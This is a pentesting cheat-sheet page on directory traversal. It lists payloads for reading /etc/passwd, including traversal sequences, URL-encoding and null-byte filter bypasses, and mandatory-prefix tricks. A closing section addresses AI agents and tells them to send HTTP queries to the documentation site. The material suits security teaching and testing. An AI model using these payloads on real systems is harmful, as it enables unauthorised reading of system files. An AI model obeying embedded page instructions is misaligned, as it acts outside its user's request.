# Directory traversal

> A directory traversal attack exploits insufficient security validation or sanitization of user-supplied file names, such that characters representing "traverse to parent directory" are passed through to the operating system's file system API.
>
> \-- [*Wikipedia*](https://en.wikipedia.org/wiki/Directory_traversal_attack)

* [PortSwigger - Web Security Academy - Directory traversal](https://portswigger.net/web-security/file-path-traversal)

## Attacks

### Traversal sequence (dot dot slash)

For each `../` you step up one directory. Just repeat this until you are in the root directory and then build up the path to the desired file from there.

```url
../../../etc/passwd
```

### Absolute path

Sometimes you can just supply an absolute path.

```url
/etc/passwd
```

### Bypass filters

#### Nested traversal sequences

When the traversal seqence is only stripped once and not recursively, you can use nested sequences, so that after stripping the inner one, there will still remain a traversal sequence, so `....//` becomes `../`.

```url
....//....//....//etc/passwd
```

#### URL encoding

Single URL encoding

```url
%2e%2e%2f
```

Double URL encoding (the `%`-char is also encoding, as `%25`)

```url
%252e%252e%252f
```

Non-standard encodings

```url
..%c0%af
..%ef%bc%8f
```

#### Mandatory prefix

If the app checks for a specific prefix, you may still be able to add traversal sequences to the file path.

```url
/var/www/images/../../../etc/passwd
```

#### Null byte termination

E.g. if the app checks for certain file extensions, you may be able to bypass the filter, by supplying a null byte `%00` and therefore termine the string early.

```url
../../../etc/passwd%00.jpg
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://d4rk1337.gitbook.io/the-pentesters-cheat-sheet/exploitation/web/directory-traversal.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.